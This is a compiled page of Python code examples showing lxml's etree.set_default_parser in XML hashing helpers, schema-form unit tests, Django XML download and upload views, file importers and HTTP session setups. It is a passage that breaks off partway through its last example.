Beispiel #1
0
def get_hash(xml_string):
    """
    Get the SHA-1 hash of an XML String, ignoring cosmetic content.

    The document is parsed with blank text, comments and processing
    instructions removed, every XML Schema ``annotation`` element is dropped,
    and the result is converted to a dict that is passed through
    ``sort_dict`` before being hashed.

    NOTE: as a side effect the cleaning parser is installed as lxml's
    default parser.

    :param xml_string: XML String to hash (text, or already encoded bytes)
    :return: hexadecimal SHA-1 digest
    """
    hash_parser = etree.XMLParser(remove_blank_text=True,
                                  remove_comments=True,
                                  remove_pis=True)
    etree.set_default_parser(parser=hash_parser)

    # Only the encoding step is guarded: input that is already a byte string
    # (or that cannot be encoded) is handed to the parser unchanged, while
    # genuine parse errors are no longer hidden behind a second attempt.
    try:
        xml_bytes = xml_string.encode('utf-8')
    except (AttributeError, UnicodeError):
        xml_bytes = xml_string

    # parse the XML String removing blanks, comments, processing instructions
    xml_tree = etree.parse(BytesIO(xml_bytes), parser=hash_parser)

    # remove all annotations
    annotations = xml_tree.findall(
        ".//{http://www.w3.org/2001/XMLSchema}annotation")
    for annotation in annotations:
        annotation.getparent().remove(annotation)
    clean_xml_string = etree.tostring(xml_tree)

    # transform into dict and order it
    xml_dict = xmltodict.parse(clean_xml_string, dict_constructor=dict)
    clean_ordered_xml_string = str(sort_dict(xml_dict))

    # hashlib only accepts bytes; text has to be encoded first (Python 3)
    if not isinstance(clean_ordered_xml_string, bytes):
        clean_ordered_xml_string = clean_ordered_xml_string.encode('utf-8')

    # compute the hash
    return hashlib.sha1(clean_ordered_xml_string).hexdigest()
Beispiel #2
0
def get_hash(xml_string):
    """ Hash an XML string so that cosmetically different documents match.

    Blank text, comments and processing instructions are dropped by the
    parser installed as lxml's default, XML Schema annotations are removed
    from the tree, and the remaining content is converted to a dict that is
    handed to ``hash_dict``.

    Args:
        xml_string (str): XML String to hash

    Returns:
        str: value returned by ``hash_dict`` (SHA-1 hash of the XML string)
    """
    annotation_path = ".//{http://www.w3.org/2001/XMLSchema}annotation"

    # Install the cleaning parser as lxml's default parser
    etree.set_default_parser(
        parser=etree.XMLParser(remove_blank_text=True,
                               remove_comments=True,
                               remove_pis=True))

    tree = XSDTree.build_tree(xml_string)

    # Detach every annotation element from its parent
    for node in tree.findall(annotation_path):
        node.getparent().remove(node)

    # Serialize the cleaned tree, turn it into a plain dict and hash it
    cleaned = XSDTree.tostring(tree)
    return hash_dict(xmltodict.parse(cleaned, dict_constructor=dict))
    def test_reload_restriction(self):
        """Reload the ``restriction/basic`` simple type from existing XML.

        Generates the simple type with ``curate_edit`` enabled, using the
        fixture XML as edit data and the text of ``/root`` as default value,
        then compares the second item of the result with the ``.reload``
        JSON fixture.
        """
        # FIXME reload restriction doesn't work
        xsd_files = join('restriction', 'basic')
        xsd_tree = self.simple_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:simpleType',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.simple_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        xml_value = xml_tree.xpath(
            "/root", namespaces=self.request.session['namespaces'])[0].text

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)

        result_string = generate_simple_type(self.request,
                                             xsd_element,
                                             xsd_tree,
                                             full_path='/root',
                                             default_value=xml_value,
                                             edit_data_tree=edit_data_tree)

        expected_dict = self.simple_type_data_handler.get_json(xsd_files +
                                                               '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
    def test_reload_sequence_unbounded(self):
        """Reload the ``sequence/unbounded`` choice from existing XML.

        Generates the choice with ``curate_edit`` enabled, using the fixture
        XML as edit data, then compares the second item of the result with
        the ``.reload`` JSON fixture.
        """
        # fixme reload sequence unbounded has a bug
        # fixme choice iter and inner element repeated

        xsd_files = join("sequence", "unbounded")
        xsd_tree = self.choice_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            "/xs:schema/xs:complexType/xs:choice", namespaces=self.request.session["namespaces"]
        )[0]

        self.request.session["curate_edit"] = True

        xml_tree = self.choice_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode("utf-8")) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)
        result_string = generate_choice(
            self.request, xsd_element, xsd_tree, full_path="/root", edit_data_tree=edit_data_tree
        )

        expected_element = self.choice_data_handler.get_json(xsd_files + ".reload")

        self.assertDictEqual(result_string[1], expected_element)
    def test_multiple(self):
        """Generate the ``multiple/basic`` extension from existing XML.

        The parsed fixture XML is passed both as default value and as edit
        data; the second item of the result is compared with the ``.reload``
        JSON fixture.
        """
        xsd_files = join('multiple', 'basic')
        xsd_tree = self.extension_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:element/xs:complexType/xs:complexContent/xs:extension',
            namespaces=self.request.session['namespaces'])[0]

        xml_tree = self.extension_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)

        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)

        result_string = generate_extension(self.request,
                                           xsd_element,
                                           xsd_tree,
                                           full_path='/root[1]',
                                           default_value=edit_data_tree,
                                           edit_data_tree=edit_data_tree)

        expected_dict = self.extension_data_handler.get_json(xsd_files +
                                                             '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
def get_hash(xml_string):
    """
    Get the SHA-1 hash of an XML String, ignoring cosmetic content.

    The document is parsed with blank text, comments and processing
    instructions removed, every XML Schema ``annotation`` element is dropped,
    and the result is converted to a dict that is passed through
    ``sort_dict`` before being hashed.

    NOTE: as a side effect the cleaning parser is installed as lxml's
    default parser.

    :param xml_string: XML String to hash (text, or already encoded bytes)
    :return: hexadecimal SHA-1 digest
    """
    hash_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
    etree.set_default_parser(parser=hash_parser)

    # Only the encoding step is guarded: input that is already a byte string
    # (or that cannot be encoded) is handed to the parser unchanged, while
    # genuine parse errors are no longer hidden behind a second attempt.
    try:
        xml_bytes = xml_string.encode('utf-8')
    except (AttributeError, UnicodeError):
        xml_bytes = xml_string

    # parse the XML String removing blanks, comments, processing instructions
    xml_tree = etree.parse(BytesIO(xml_bytes), parser=hash_parser)

    # remove all annotations
    annotations = xml_tree.findall(".//{http://www.w3.org/2001/XMLSchema}annotation")
    for annotation in annotations:
        annotation.getparent().remove(annotation)
    clean_xml_string = etree.tostring(xml_tree)

    # transform into dict and order it
    xml_dict = xmltodict.parse(clean_xml_string, dict_constructor=dict)
    clean_ordered_xml_string = str(sort_dict(xml_dict))

    # hashlib only accepts bytes; text has to be encoded first (Python 3)
    if not isinstance(clean_ordered_xml_string, bytes):
        clean_ordered_xml_string = clean_ordered_xml_string.encode('utf-8')

    # compute the hash
    return hashlib.sha1(clean_ordered_xml_string).hexdigest()
Beispiel #7
0
def setup_html():
    """Prepare lxml for validating XHTML and return the usable ``etree``.

    Tries to bind ``lxml.etree`` to the module-level ``etree`` name. When
    lxml is available and recent enough, a DTD-validating parser whose
    resolver loads DTDs from ``../trac/tests/functional`` (relative to this
    file) is installed as lxml's default parser.

    Returns the module-level ``etree`` value: the lxml module when
    validation is possible, otherwise a false value.
    """
    global etree
    try:
        from lxml import etree
    except ImportError:
        print("can't validate the XHTML parts in Jinja2 templates"
              " (no lxml installed)")

    if etree and pv(etree.__version__) < pv('2.0.0'):
        # 2.0.7 and 2.1.x are known to work.
        print("can't validate the XHTML parts in Jinja2 templates"
              " (lxml < 2.0, api incompatibility)")
        # Actually disable validation, as the message announces, instead of
        # going on to use the incompatible API below.
        etree = None

    if etree:
        # Note: this code derived from trac/tests/functional (FIXME)

        class Resolver(etree.Resolver):
            # ./contrib/jinjachecker.py # <- we live here
            # ./trac/tests/functional/  # <- there are the DTDs
            contrib_dir = dirname(abspath(__file__))
            base_dir = normpath(join(contrib_dir, '../trac/tests/functional'))

            def resolve(self, system_url, public_id, context):
                # Only the last path component of the system URL is used;
                # the DTD is looked up locally under base_dir.
                filename = join(self.base_dir, system_url.split("/")[-1])
                return self.resolve_filename(filename, context)

        parser = etree.XMLParser(dtd_validation=True)
        parser.resolvers.add(Resolver())
        etree.set_default_parser(parser)
    return etree
    def test_reload_multiple(self):
        """Reload the ``multiple/basic`` complex type from existing XML.

        Generates the complex type with ``curate_edit`` enabled, using the
        fixture XML as edit data, then compares the second item of the
        result with the ``.reload`` JSON fixture.
        """
        # fixme test broken
        xsd_files = join('multiple', 'basic')
        xsd_tree = self.complex_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:complexType',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.complex_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)
        result_string = generate_complex_type(self.request,
                                              xsd_element,
                                              xsd_tree,
                                              full_path='/root',
                                              edit_data_tree=edit_data_tree)

        expected_element = self.complex_type_data_handler.get_json(xsd_files +
                                                                   '.reload')

        self.assertDictEqual(result_string[1], expected_element)
Beispiel #9
0
    def import_file(self, source):
        """imports BuildingSync file

        Parses the document into ``self.element_tree``, stores the result of
        ``self._parse_version()`` in ``self.version``, calls
        ``self.fix_namespaces()`` when the root namespace map lacks the
        ``auc`` or ``xsi`` prefix, and sets ``xsi:schemaLocation`` on the
        root to the BuildingSync schema of the parsed version.

        As a side effect a blank-text-removing parser is installed as lxml's
        default parser.

        :param source: string | object, path to file or a file like object
        :raises ParsingError: if ``source`` is a string that is not an existing file
        :return: True
        """
        parser = etree.XMLParser(remove_blank_text=True)
        etree.set_default_parser(parser)
        # save element tree
        if isinstance(source, str):
            if not os.path.isfile(source):
                raise ParsingError("File not found: {}".format(source))
            # Open in binary mode so the XML parser detects the encoding from
            # the document itself rather than receiving text that was already
            # decoded with the platform's default encoding.
            with open(source, 'rb') as f:
                self.element_tree = etree.parse(f)
        else:
            self.element_tree = etree.parse(source)

        self.version = self._parse_version()

        # if the namespace map is missing the auc or xsi prefix, fix the tree to include it
        root_nsmap = self.element_tree.getroot().nsmap
        if root_nsmap.get('auc') is None or root_nsmap.get('xsi') is None:
            self.fix_namespaces()

        # The root is fetched again after the namespace fix rather than
        # reused from above.
        root = self.element_tree.getroot()
        root.set(
            '{http://www.w3.org/2001/XMLSchema-instance}schemaLocation',
            'http://buildingsync.net/schemas/bedes-auc/2019 https://raw.githubusercontent.com/BuildingSync/schema/v{}/BuildingSync.xsd'
            .format(self.version))

        return True
    def test_reload_restriction(self):
        """Reload the ``restriction/basic`` simple type from existing XML.

        Generates the simple type with ``curate_edit`` enabled, using the
        fixture XML as edit data and the text of ``/root`` as default value,
        then compares the second item of the result with the ``.reload``
        JSON fixture.
        """
        # FIXME reload restriction doesn't work
        xsd_files = join('restriction', 'basic')
        xsd_tree = self.simple_type_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath('/xs:schema/xs:simpleType', namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.simple_type_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        xml_value = xml_tree.xpath("/root", namespaces=self.request.session['namespaces'])[0].text

        clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)

        result_string = generate_simple_type(self.request, xsd_element, xsd_tree, full_path='/root',
                                             default_value=xml_value, edit_data_tree=edit_data_tree)

        expected_dict = self.simple_type_data_handler.get_json(xsd_files + '.reload')

        self.assertDictEqual(result_string[1], expected_dict)
    def test_reload_simple_type_unbounded(self):
        """Reload the ``simple_type/unbounded`` element from existing XML.

        Generates the element with ``curate_edit`` enabled, using the fixture
        XML as edit data, then compares the second item of the result with
        the ``.reload`` JSON fixture.
        """
        xsd_files = join('simple_type', 'unbounded')
        xsd_tree = self.element_data_handler.get_xsd(xsd_files)
        xsd_element = xsd_tree.xpath(
            '/xs:schema/xs:complexType/xs:sequence/xs:element',
            namespaces=self.request.session['namespaces'])[0]

        self.request.session['curate_edit'] = True

        xml_tree = self.element_data_handler.get_xml(xsd_files)
        xml_data = etree.tostring(xml_tree)

        clean_parser = etree.XMLParser(remove_blank_text=True,
                                       remove_comments=True,
                                       remove_pis=True)
        etree.set_default_parser(parser=clean_parser)
        # Load the XML tree straight from the serialized data. The former
        # str(xml_data.encode('utf-8')) round-trip left the data unchanged on
        # Python 2 and raised AttributeError on Python 3, where tostring()
        # returns bytes.
        edit_data_tree = etree.XML(xml_data)

        result_string = generate_element(self.request,
                                         xsd_element,
                                         xsd_tree,
                                         full_path='/root',
                                         edit_data_tree=edit_data_tree)

        expected_element = self.element_data_handler.get_json(xsd_files +
                                                              '.reload')

        self.assertDictEqual(result_string[1], expected_element)
Beispiel #12
0
def download_xml_build_req(request):
    """Two-step download of the XML stored under ``xmlStringOAIPMH``.

    POST: takes the XML kept in ``request.session['xmlStringOAIPMH']``,
    pretty-prints it when it can be parsed (otherwise keeps it as is), saves
    it as an ``XML2Download`` record and returns the record id as JSON. A
    bad-request response is returned when the session holds no XML.

    Any other method: loads the ``XML2Download`` record named by the ``id``
    query parameter, deletes it, and returns its content as an XML
    attachment; redirects to ``/`` when no id is given.
    """
    #POST request
    if request.method == 'POST':
        if 'xmlStringOAIPMH' in request.session:
            #We retrieve the XML file in session
            xmlDataObject = request.session['xmlStringOAIPMH']
            try:
                # Load a parser able to clean the XML from blanks, comments and processing instructions
                clean_parser = etree.XMLParser(remove_blank_text=True,
                                               remove_comments=True,
                                               remove_pis=True)
                # set the parser
                etree.set_default_parser(parser=clean_parser)
                # load the XML tree from the text
                xmlDoc = etree.XML(str(xmlDataObject.encode('utf-8')))
                xmlStringEncoded = etree.tostring(xmlDoc, pretty_print=True)
            except Exception:
                # Best effort: when the content cannot be cleaned and
                # pretty-printed, offer it unchanged. Unlike a bare except,
                # this lets SystemExit and KeyboardInterrupt propagate.
                xmlStringEncoded = xmlDataObject

            #Get the date to append it to the file title
            i = datetime.datetime.now()
            title = "OAI_PMH_BUILD_REQ_%s_.xml" % i.isoformat()
            #Use the XML2Download collection to save the XML to download. We can't directly return the XML
            #because this method is called via Ajax. We need to save the XML and call the GET request of this function
            #in the success part of the Ajax call
            xml2download = XML2Download(title=title,
                                        xml=xmlStringEncoded).save()
            xml2downloadID = str(xml2download.id)
            #Return the ID to call the GET request with it
            response_dict = {"xml2downloadID": xml2downloadID}
            return HttpResponse(json.dumps(response_dict),
                                content_type='application/javascript')
        else:
            return HttpResponseBadRequest(
                'An error occured. Please reload the page and try again.')
    else:
        #Get the XML2Download ID
        xml2downloadID = request.GET.get('id', None)
        if xml2downloadID is not None:
            #Get the XML
            xmlDataObject = XML2Download.objects.get(pk=xml2downloadID)
            #Encode the XML
            xmlStringEncoded = xmlDataObject.xml.encode('utf-8')
            fileObj = StringIO(xmlStringEncoded)
            #Delete the record; the object's attributes are still read below
            xmlDataObject.delete()
            #Check that the file is ending by .xml
            if not xmlDataObject.title.lower().endswith('.xml'):
                xmlDataObject.title += ".xml"
            #Return the XML file
            response = HttpResponse(FileWrapper(fileObj),
                                    content_type='application/xml')
            response[
                'Content-Disposition'] = 'attachment; filename=' + xmlDataObject.title
            #Put the downloaded content back in the session
            request.session['xmlStringOAIPMH'] = xmlStringEncoded

            return response
        else:
            return redirect('/')
def read_xml_file(xml_path, namespace_dict=None, remove_comments=False):
    """Parse the XML file at ``xml_path`` and return the resulting tree.

    The parser used for the file is created with the given
    ``remove_comments`` setting and is afterwards installed as lxml's default
    parser. Each ``prefix -> uri`` pair of ``namespace_dict`` (if any) is
    registered with ``etree.register_namespace``.
    """
    xml_parser = etree.XMLParser(remove_comments=remove_comments)
    document = etree.parse(xml_path, parser=xml_parser)
    etree.set_default_parser(xml_parser)

    # A missing or empty mapping simply registers nothing
    for prefix, uri in (namespace_dict or {}).items():
        etree.register_namespace(prefix, uri)

    return document
 def cleanXML(self, xml):
     """Return ``xml`` re-serialized without blanks, comments and PIs.

     The cleaning parser is also installed as lxml's default parser.

     :param xml: XML document as text or as an encoded byte string
     :return: serialized XML as produced by ``etree.tostring``
     """
     clean_parser = etree.XMLParser(remove_blank_text=True,remove_comments=True,remove_pis=True)
     # set the parser
     etree.set_default_parser(parser=clean_parser)
     # Give the parser bytes: wrapping the encoded value in str() produced the
     # literal "b'...'" on Python 3, which is not XML. Input that is already a
     # byte string is passed through untouched.
     xml_bytes = xml if isinstance(xml, bytes) else xml.encode('utf-8')
     # load the XML tree from the text
     xmlEncoding = etree.XML(xml_bytes)
     xmlStr = etree.tostring(xmlEncoding)
     return xmlStr
Beispiel #15
0
 def cleanXML(self, xml):
     """Return ``xml`` re-serialized without blanks, comments and PIs.

     The cleaning parser is also installed as lxml's default parser.

     :param xml: XML document as text or as an encoded byte string
     :return: serialized XML as produced by ``etree.tostring``
     """
     clean_parser = etree.XMLParser(remove_blank_text=True,remove_comments=True,remove_pis=True)
     # set the parser
     etree.set_default_parser(parser=clean_parser)
     # Give the parser bytes: wrapping the encoded value in str() produced the
     # literal "b'...'" on Python 3, which is not XML. Input that is already a
     # byte string is passed through untouched.
     xml_bytes = xml if isinstance(xml, bytes) else xml.encode('utf-8')
     # load the XML tree from the text
     xmlEncoding = etree.XML(xml_bytes)
     xmlStr = etree.tostring(xmlEncoding)
     return xmlStr
Beispiel #16
0
    def __init__(self, filename=None, log=None):
        """Store the logger and optional filename, then set lxml's default parser.

        ``self.filename`` is only assigned when a filename is given. The
        default parser installed here strips blank text.
        """
        self.log = log

        if filename is not None:
            self.filename = filename

        # Parser is created and registered in one step
        ET.set_default_parser(ET.XMLParser(remove_blank_text=True))
Beispiel #17
0
def MyParser():
    """Yield once while ``XSD_PARSER`` is lxml's default parser.

    If ``XSD_PARSER`` already is the default parser nothing is changed.
    Otherwise it is installed for the duration of the ``yield`` and lxml's
    built-in default parser is restored afterwards, even if the body raised.

    NOTE(review): presumably used through ``contextlib.contextmanager``; the
    decorator is not visible here - confirm at the definition site.
    """
    # get_default_parser must be *called*: comparing the function object
    # itself with XSD_PARSER was always False.
    if etree.get_default_parser() is XSD_PARSER:
        yield
    else:
        etree.set_default_parser(XSD_PARSER)
        try:
            yield
        finally:
            # Calling without an argument resets to lxml's built-in default
            etree.set_default_parser()
Beispiel #18
0
    def __init__(self, **kwargs):
        """Build the SVG parser and register it as lxml's default parser.

        Arguments:
            **kwargs: Forwarded unchanged to lxml.etree.XMLParser.__init__().
        """
        svg_parser = etree.XMLParser(**kwargs)
        # Elements created by this parser are looked up through
        # SVGElementClassLookup
        svg_parser.set_element_class_lookup(SVGElementClassLookup())

        self._parser = svg_parser
        etree.set_default_parser(svg_parser)
def _dependencies_json_response(payload):
    """Serialize ``payload`` to JSON in the response format used by this view."""
    return HttpResponse(json.dumps(payload), content_type='application/javascript')


def resolve_dependencies(request):
    """Resolve the dependencies of the uploaded schema and save it.

    Reads the uploaded object (content, name, filename, type) from the
    session and the ``schemaLocations[]`` / ``dependencies[]`` lists from the
    POST data, rewrites the schema's dependencies via ``update_dependencies``
    and validates the result. On success the object is saved either as a new
    version (when ``uploadVersion`` is in the session) or as a new Template /
    Type, and a JSON ``redirect`` is returned. On failure a JSON
    ``errorDependencies`` message is returned.
    """
    print('BEGIN def resolveDependencies(request)')
    schema_locations = request.POST.getlist('schemaLocations[]')
    dependencies = request.POST.getlist('dependencies[]')

    session = request.session
    required_keys = ('uploadObjectName', 'uploadObjectFilename',
                     'uploadObjectContent', 'uploadObjectType')
    # Without the uploaded object there is nothing to process; report it
    # through the existing error channel instead of failing with a NameError.
    if any(key not in session or session[key] is None for key in required_keys):
        return _dependencies_json_response(
            {'errorDependencies': 'No uploaded object found. Please upload the file again.'})

    object_content = session['uploadObjectContent']
    name = session['uploadObjectName']
    filename = session['uploadObjectFilename']
    object_type = session['uploadObjectType']

    # Load a parser able to clean the XML from blanks, comments and processing instructions
    clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
    # set the parser
    etree.set_default_parser(parser=clean_parser)

    # Parse the encoded bytes directly: wrapping them in str() yields the
    # literal "b'...'" on Python 3, which is not XML.
    xsd_tree = etree.XML(object_content.encode('utf-8'))

    # replace includes/imports by API calls (get dependencies starting by the imports)
    update_dependencies(xsd_tree, dict(zip(schema_locations, dependencies)))

    # validate the schema
    error = validate_xml_schema(xsd_tree)
    if error is not None:
        return _dependencies_json_response({'errorDependencies': error.replace("'", "")})

    # Only these two object types have a save path below
    if object_type not in ('Template', 'Type'):
        return _dependencies_json_response(
            {'errorDependencies': 'Unsupported object type: {0}'.format(object_type)})

    object_content = etree.tostring(xsd_tree)
    has_version = 'uploadVersion' in session and session['uploadVersion'] is not None
    if has_version:
        # create a new version
        object_versions_id = session['uploadVersion']
        if object_type == 'Template':
            new_object = create_template_version(object_content, filename, object_versions_id)
        else:
            new_object = create_type_version(object_content, filename, object_versions_id)
        redirect_url = '/admin/manage_versions?type={0}&id={1}'.format(object_type, str(new_object.id))
    elif object_type == 'Template':
        # create new template
        create_template(object_content, name, filename, dependencies)
        redirect_url = '/admin/xml-schemas/manage-schemas'
    else:
        # create new type
        if 'uploadBuckets' in session and session['uploadBuckets'] is not None:
            buckets = session['uploadBuckets']
        else:
            # NOTE(review): previously a NameError when no buckets were in the
            # session; an empty list is assumed to mean "no buckets" - confirm
            # against create_type.
            buckets = []
        create_type(object_content, name, filename, buckets, dependencies)
        redirect_url = '/admin/xml-schemas/manage-types'

    messages.add_message(request, messages.INFO, '{} uploaded with success.'.format(object_type))
    return _dependencies_json_response({'redirect': redirect_url})
Beispiel #20
0
 def __init__(self, k, ref):
     """Set up the HTTP session used for key ``k`` with referer ``ref``.

     An HTML parser becomes lxml's default parser. The session starts from a
     copy of ``self.headers``, adds ``ref`` as the ``Referer`` header and
     sends ``k`` as the ``k`` query parameter.
     """
     etree.set_default_parser(etree.HTMLParser())

     session = requests.Session()
     # CZ: 213.211.36.146:8080
     #session.proxies={'https': '187.141.117.215:8080'}
     session.headers = self.headers.copy()
     # 'https://www.google.com/recaptcha/api2/demo'
     session.headers['Referer'] = ref
     session.params = {'k': k}

     self.s = session
     self.k = k
Beispiel #21
0
 def __init__(self):
     """Install an HTML default parser and initialise the base class.

     The base initialiser receives ``pp``, a headers dict carrying a Firefox
     47 ``User-Agent``, and the ``proxy_headers`` / ``timeout`` values taken
     from the enclosing scope. ``self.baseurl`` starts out as ``None``.
     """
     etree.set_default_parser(etree.HTMLParser())
     #self.sessid=randint(0, 1000000)
     user_agent = ('Mozilla/5.0 (X11; Linux x86_64; rv:47.0) '
                   'Gecko/20100101 Firefox/47.0')
     default_headers = {'User-Agent': user_agent}
     super().__init__(pp,
                      default_headers,
                      proxy_headers=proxy_headers,
                      timeout=timeout)
     self.baseurl = None
def download_xml_build_req(request):
    """Two-step download of the XML stored under ``xmlStringOAIPMH``.

    POST: takes the XML kept in ``request.session['xmlStringOAIPMH']``,
    pretty-prints it when it can be parsed (otherwise keeps it as is), saves
    it as an ``XML2Download`` record and returns the record id as JSON. A
    bad-request response is returned when the session holds no XML.

    Any other method: loads the ``XML2Download`` record named by the ``id``
    query parameter, deletes it, and returns its content as an XML
    attachment; redirects to ``/`` when no id is given.
    """
    #POST request
    if request.method == 'POST':
        if 'xmlStringOAIPMH' in request.session:
            #We retrieve the XML file in session
            xmlDataObject = request.session['xmlStringOAIPMH']
            try:
                # Load a parser able to clean the XML from blanks, comments and processing instructions
                clean_parser = etree.XMLParser(remove_blank_text=True, remove_comments=True, remove_pis=True)
                # set the parser
                etree.set_default_parser(parser=clean_parser)
                # load the XML tree from the text
                xmlDoc = etree.XML(str(xmlDataObject.encode('utf-8')))
                xmlStringEncoded = etree.tostring(xmlDoc, pretty_print=True)
            except Exception:
                # Best effort: when the content cannot be cleaned and
                # pretty-printed, offer it unchanged. Unlike a bare except,
                # this lets SystemExit and KeyboardInterrupt propagate.
                xmlStringEncoded = xmlDataObject

            #Get the date to append it to the file title
            i = datetime.datetime.now()
            title = "OAI_PMH_BUILD_REQ_%s_.xml" % i.isoformat()
            #Use the XML2Download collection to save the XML to download. We can't directly return the XML
            #because this method is called via Ajax. We need to save the XML and call the GET request of this function
            #in the success part of the Ajax call
            xml2download = XML2Download(title=title, xml=xmlStringEncoded).save()
            xml2downloadID = str(xml2download.id)
            #Return the ID to call the GET request with it
            response_dict = {"xml2downloadID": xml2downloadID}
            return HttpResponse(json.dumps(response_dict), content_type='application/javascript')
        else:
            return HttpResponseBadRequest('An error occured. Please reload the page and try again.')
    else:
        #Get the XML2Download ID
        xml2downloadID = request.GET.get('id', None)
        if xml2downloadID is not None:
            #Get the XML
            xmlDataObject = XML2Download.objects.get(pk=xml2downloadID)
            #Encode the XML
            xmlStringEncoded = xmlDataObject.xml.encode('utf-8')
            fileObj = StringIO(xmlStringEncoded)
            #Delete the record; the object's attributes are still read below
            xmlDataObject.delete()
            #Check that the file is ending by .xml
            if not xmlDataObject.title.lower().endswith('.xml'):
                xmlDataObject.title += ".xml"
            #Return the XML file
            response = HttpResponse(FileWrapper(fileObj), content_type='application/xml')
            response['Content-Disposition'] = 'attachment; filename=' + xmlDataObject.title
            #Put the downloaded content back in the session
            request.session['xmlStringOAIPMH'] = xmlStringEncoded

            return response
        else:
            return redirect('/')
Beispiel #23
0
 def __init__(self):
     """Install an HTML default parser and initialise the base class.

     The base initialiser receives ``pp``, a Firefox 57 ``User-Agent`` with
     an English ``Accept-Language`` header, and a timeout of 180.
     ``self.cache`` is set to ``basedir`` from the enclosing scope.
     """
     etree.set_default_parser(etree.HTMLParser())

     # 'Accept' and 'Accept-Encoding' are intentionally not sent:
     #   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
     #   'Accept-Encoding': 'gzip, deflate'
     request_headers = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0',
         'Accept-Language': 'en-US,en;q=0.5',
     }
     super().__init__(pp, headers=request_headers, timeout=180)
     self.cache = basedir
Beispiel #24
0
def main():
    """Generate a simulation config from ``kilobot_generic_controller.argos``.

    Command line: ``<folder> <numberofrobots> <alpha> <rho> <speed>``.

    The template in ``<folder>`` is parsed with comments preserved, the
    ``params`` and ``loop_functions`` elements are updated with the given
    values, and the result is written to
    ``<folder>/generated_configs/kilobot_sim_<speed>_<n>_<alpha>_<rho>.argos``.
    Prints the help text and exits with status -1 when arguments are missing.
    """
    number_of_args = len(sys.argv)
    parser = etree.XMLParser(remove_comments=False)
    etree.set_default_parser(parser)

    if number_of_args < 6:
        print_help()
        # sys.exit rather than the interactive-only exit() helper, which is
        # injected by the site module and not guaranteed to exist
        sys.exit(-1)

    folder = sys.argv[1]
    numberofrobots = int(sys.argv[2])
    alpha = float(sys.argv[3])
    rho = float(sys.argv[4])
    speed = float(sys.argv[5])
    generated_configs_folder = folder + "/generated_configs"

    if not os.path.exists(generated_configs_folder):
        os.makedirs(generated_configs_folder)

    tree = etree.parse(folder + "/kilobot_generic_controller.argos")
    root = tree.getroot()

    for params in root.iter('params'):
        # Only the placeholder behavior of the generic template is replaced
        if (params.get("behavior") ==
                "build/behaviors_simulation/CRWLEVY_2.0_0.90"):
            params.set(
                "behavior",
                "build/behaviors_simulation/CRWLEVY_%.1f_%.2f" % (alpha, rho))
        if params.get("linearvelocity"):
            params.set("linearvelocity", "%.2f" % speed)

    for loop_functions in root.iter('loop_functions'):
        loop_functions.set("alpha", "%.1f" % alpha)
        loop_functions.set("rho", "%.2f" % rho)
        loop_functions.set("num_robots", "%d" % numberofrobots)
        loop_functions.set("speed", "%.2f" % speed)

    # The former comment-stripping loop after this write was dropped: it ran
    # after the file was written, so it never affected the output, and it
    # crashed on comments located outside the root element (no parent).
    tree.write(generated_configs_folder +
               "/kilobot_sim_%.02f_%d_%.1f_%.2f.argos" %
               (speed, numberofrobots, alpha, rho),
               xml_declaration=True)
Beispiel #25
0
    def get_flat(self):
        """ Returns the flattened file

        Installs a default parser that strips blanks, comments and processing
        instructions, builds the tree of ``self.xml_string`` and hands it to
        ``self._replace_all_includes_by_content``.

        Returns:
            the result of ``self._replace_all_includes_by_content``

        """
        # build the cleaning parser and make it lxml's default in one step
        etree.set_default_parser(
